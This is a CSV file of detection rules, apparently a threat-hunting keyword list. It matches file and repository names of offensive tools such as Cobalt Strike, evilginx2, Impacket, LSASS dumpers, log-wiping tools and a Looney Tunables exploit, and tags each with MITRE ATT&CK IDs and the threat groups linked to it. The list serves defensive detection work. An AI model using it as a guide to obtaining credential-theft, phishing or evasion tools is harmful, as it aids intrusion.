"*/localtonet.git*",".{0,1000}\/localtonet\.git.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8593" "*/localtonet.service*",".{0,1000}\/localtonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#linux","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8594" "*/localtonet-win*",".{0,1000}\/localtonet\-win.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8595" "*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","8601" "*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8602" "*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8603" "*/Lockless.git*",".{0,1000}\/Lockless\.git.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","8604" "*/Locksmith.git*",".{0,1000}\/Locksmith\.git.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","8605" "*/log_file_timestamps.json*",".{0,1000}\/log_file_timestamps\.json.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8609" "*/log4shell.py*",".{0,1000}\/log4shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 
- T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8610" "*/login/e1837f4d-1d0c-49b8-a242-8f653226c137*",".{0,1000}\/login\/e1837f4d\-1d0c\-49b8\-a242\-8f653226c137.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","8611" "*/login_scanner*",".{0,1000}\/login_scanner.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8612" "*/loginAAD.ps1*",".{0,1000}\/loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","8613" "*/login-securite/DonPAPI*",".{0,1000}\/login\-securite\/DonPAPI.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","8614" "*/logon_backdoor.git*",".{0,1000}\/logon_backdoor\.git.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","8615" "*/logonuifox.dll*",".{0,1000}\/logonuifox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various 
password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","8616" "*/logs/*/becon_*.log",".{0,1000}\/logs\/.{0,1000}\/becon_.{0,1000}\.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","#logfile #linux","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","8617" 
"*/logs/beacon_log*",".{0,1000}\/logs\/beacon_log.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","8618" "*/logs/empire_server.log*",".{0,1000}\/logs\/empire_server\.log.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid 
Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","8619" "*/lolbin.exe*",".{0,1000}\/lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8620" "*/lolminer.exe*",".{0,1000}\/lolminer\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8621" 
"*/lolMiner_v*_Win64.zip*",".{0,1000}\/lolMiner_v.{0,1000}_Win64\.zip.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8622" "*/lolMinerGUI.exe*",".{0,1000}\/lolMinerGUI\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8623" "*/LOLSpoof.git*",".{0,1000}\/LOLSpoof\.git.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8624" "*/LOLSpoof.nim*",".{0,1000}\/LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8625" "*/LOLSpoof/releases/download/*",".{0,1000}\/LOLSpoof\/releases\/download\/.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8626" "*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8627" "*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8628" "*/LooneyPwner.git*",".{0,1000}\/LooneyPwner\.git.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","8629" "*/looneypwner.sh*",".{0,1000}\/looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","8630" "*/loot_default/*.exe*",".{0,1000}\/loot_default\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - 
T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8631" "*/loot_default/*.ps1*",".{0,1000}\/loot_default\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8632" "*/loot_default/*.py*",".{0,1000}\/loot_default\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8633" "*/loot_finder*",".{0,1000}\/loot_finder.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8634" "*/lpBunny/bof-registry*",".{0,1000}\/lpBunny\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","8635" "*/LPE_Reflect_Elevate.x64.dll*",".{0,1000}\/LPE_Reflect_Elevate\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8636" "*/lsa_dump_*.txt*",".{0,1000}\/lsa_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8637" "*/lsadump.py*",".{0,1000}\/lsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - 
TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","8638" "*/lsarelayx.git*",".{0,1000}\/lsarelayx\.git.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","8639" "*/lsasecrets.py*",".{0,1000}\/lsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","8640" "*/lsass.DMP*",".{0,1000}\/lsass\.DMP.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","8641" "*/lsass.rar*",".{0,1000}\/lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8642" "*/lsass.zip*",".{0,1000}\/lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for 
capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8643" "*/lsass/beacon.h*",".{0,1000}\/lsass\/beacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","8644" 
